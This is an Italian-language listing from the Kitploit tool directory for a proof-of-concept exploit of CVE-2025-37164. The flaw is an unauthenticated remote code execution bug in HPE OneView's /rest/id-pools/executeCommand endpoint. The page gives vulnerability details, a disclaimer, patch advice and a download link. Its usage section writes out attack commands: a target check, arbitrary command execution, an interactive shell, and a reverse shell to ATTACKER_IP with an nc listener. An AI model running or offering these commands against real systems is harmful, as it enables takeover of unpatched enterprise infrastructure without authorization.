Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-37164-PoC — Exploit proof-of-concept per CVE-2025-37164, una vulnerabilità critica di esecuzione remota di codice non autenticata in HPE OneView tramite l'endpoint /rest/id-pools/executeCommand. | Kitploit
Strumenti/GitHubGitHub/g0vguy/cve-2025-37164-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed Teaming
GitHubg0vguy/cve-2025-37164-poc

CVE-2025-37164-PoC

Exploit proof-of-concept per CVE-2025-37164, una vulnerabilità critica di esecuzione remota di codice non autenticata in HPE OneView tramite l'endpoint /rest/id-pools/executeCommand.

Vedi Repository
6299 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-37164 - PoC di RCE non autenticata su HPE OneView

Exploit Proof-of-Concept per CVE-2025-37164, una vulnerabilità critica (CVSS 10.0) di esecuzione remota di codice non autenticata in HPE OneView.

AVVERTENZA

QUESTO SOFTWARE È FORNITO SOLO A SCOPO EDUCATIVO E PER TEST DI SICUREZZA AUTORIZZATI.

  • Utilizzare solo su sistemi di propria proprietà o per i quali si dispone di esplicita autorizzazione scritta per il test
  • L'accesso non autorizzato a sistemi informatici è illegale
  • L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento
  • Questo strumento è destinato alla ricerca di sicurezza difensiva e al penetration testing in ambienti controllati

Dettagli della vulnerabilità

  • CVE ID: CVE-2025-37164
  • Punteggio CVSS: 10.0 (CRITICO)
  • Fornitore: Hewlett Packard Enterprise (HPE)
  • Prodotto: HPE OneView (versioni precedenti alla 11.0)
  • Tipo: Esecuzione remota di codice non autenticata
  • Patch: Aggiornare a HPE OneView 11.0 o superiore

Analisi tecnica: La vulnerabilità risiede nell'endpoint PUT /rest/id-pools/executeCommand che non richiede autenticazione e passa input controllato dall'utente direttamente a Runtime.exec().

Prerequisiti

  • Python 3.6+
  • Libreria requests (pip install requests)
  • Istanza vulnerabile di HPE OneView (con funzionalità 'id pools' abilitata)

Utilizzo

# Test if target is vulnerable
python3 cve-2025-37164.py -t http://target-ip --check

# Execute a single command
python3 cve-2025-37164.py -t http://target-ip -c "id"

# Interactive command shell
python3 cve-2025-37164.py -t http://target-ip -i

# Attempt reverse shell (requires listener)
# On attacker machine: nc -lvnp 4444
python3 cve-2025-37164.py -t http://target-ip --lhost ATTACKER_IP --lport 4444
Scarica lo strumento